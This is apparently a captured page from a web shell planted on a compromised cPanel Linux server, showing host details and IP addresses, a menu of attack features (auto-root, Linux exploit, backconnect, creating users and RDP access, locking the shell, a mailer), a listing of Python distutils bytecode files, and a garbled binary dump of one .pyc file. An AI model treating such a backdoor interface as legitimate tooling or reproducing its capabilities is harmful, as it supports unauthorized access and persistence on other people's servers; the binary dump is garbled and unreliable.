Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.146
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
distutils /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
621
B
-rw-r--r--
_msvccompiler.cpython-310.pyc
12.53
KB
-rw-r--r--
archive_util.cpython-310.pyc
6.36
KB
-rw-r--r--
bcppcompiler.cpython-310.pyc
6.34
KB
-rw-r--r--
ccompiler.cpython-310.pyc
32.27
KB
-rw-r--r--
cmd.cpython-310.pyc
13.57
KB
-rw-r--r--
config.cpython-310.pyc
3.45
KB
-rw-r--r--
core.cpython-310.pyc
6.45
KB
-rw-r--r--
cygwinccompiler.cpython-310.py...
8.26
KB
-rw-r--r--
debug.cpython-310.pyc
197
B
-rw-r--r--
dep_util.cpython-310.pyc
2.65
KB
-rw-r--r--
dir_util.cpython-310.pyc
6.02
KB
-rw-r--r--
dist.cpython-310.pyc
33.15
KB
-rw-r--r--
errors.cpython-310.pyc
4.82
KB
-rw-r--r--
extension.cpython-310.pyc
6.81
KB
-rw-r--r--
fancy_getopt.cpython-310.pyc
10.33
KB
-rw-r--r--
file_util.cpython-310.pyc
5.78
KB
-rw-r--r--
filelist.cpython-310.pyc
9.6
KB
-rw-r--r--
log.cpython-310.pyc
2.2
KB
-rw-r--r--
msvc9compiler.cpython-310.pyc
17.1
KB
-rw-r--r--
msvccompiler.cpython-310.pyc
14.38
KB
-rw-r--r--
spawn.cpython-310.pyc
3.33
KB
-rw-r--r--
sysconfig.cpython-310.pyc
7.59
KB
-rw-r--r--
text_file.cpython-310.pyc
8.22
KB
-rw-r--r--
unixccompiler.cpython-310.pyc
7.04
KB
-rw-r--r--
util.cpython-310.pyc
15.27
KB
-rw-r--r--
version.cpython-310.pyc
7.13
KB
-rw-r--r--
versionpredicate.cpython-310.p...
5.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.cpython-310.pyc
o ��bc(R � @ s d Z ddlZddlZddlZddlZddlZddlZddlm Z ddl mZ ddlm Z ddlmZ ddlmZ dd � Zd d� Zdd � Zdd� Zdadd� Zdd� Zd*dd�Zd a aadd� Zdd� Zd+dd�Zdd� Z d,d d!�Zd"d#� Z d-d$d%�Z! d.d&d'�Z"G d(d)� d)�Z#dS )/zudistutils.util Miscellaneous utility functions -- anything that doesn't fit into one of the other *util.py modules. � N)�DistutilsPlatformError)�newer)�spawn)�log)�DistutilsByteCompileErrorc C s� t jdkr#dtj�� v rdS dtj�� v rdS dtj�� v r dS tjS dt jv r-t jd S t jd ks7tt d �s:tjS t �� \} }}}}| �� � dd�} |� d d�}|� dd�}| dd� dkred| |f S | dd� dkr�|d dkr�d} dt |d �d |dd� f }ddd�}|d|tj 7 }nL| dd� dkr�dd lm } |� S | dd!� d"kr�d"} t�d#tj�}|�|�}|r�|�� }n| dd!� d$kr�ddl} ddl} | �| j�� | ||�\} }}d%| ||f S )&a� Return a string that identifies the current platform. This is used mainly to distinguish platform-specific build directories and platform-specific built distributions. Typically includes the OS name and version and the architecture (as supplied by 'os.uname()'), although the exact information included depends on the OS; eg. on Linux, the kernel version isn't particularly important. Examples of returned values: linux-i586 linux-alpha (?) solaris-2.6-sun4u Windows will return one of: win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc) win32 (all others - specifically, sys.platform is returned) For other non-POSIX platforms, currently just returns 'sys.platform'. �nt�amd64� win-amd64z(arm)� win-arm32z(arm64)z win-arm64�_PYTHON_HOST_PLATFORM�posix�uname�/� � �_�-N� �linuxz%s-%s�sunosr �5�solarisz%d.%s� � �32bit�64bit)i���l ���� z.%s�aix)�aix_platform� �cygwinz[\d.]+�darwinz%s-%s-%s)�os�name�sys�version�lower�platform�environ�hasattrr �replace�int�maxsize�_aix_supportr �re�compile�ASCII�match�group�_osx_support�distutils.sysconfig�get_platform_osx� sysconfig�get_config_vars)�osname�host�releaser$ �machine�bitnessr �rel_re�mr2 � distutils� r? �%/usr/lib/python3.10/distutils/util.py�get_host_platform sT � � �rA c C s4 t jdkrdddd�} | �t j�d��pt� S t� S )Nr �win32r r )�x86�x64�arm�VSCMD_ARG_TGT_ARCH)r! r"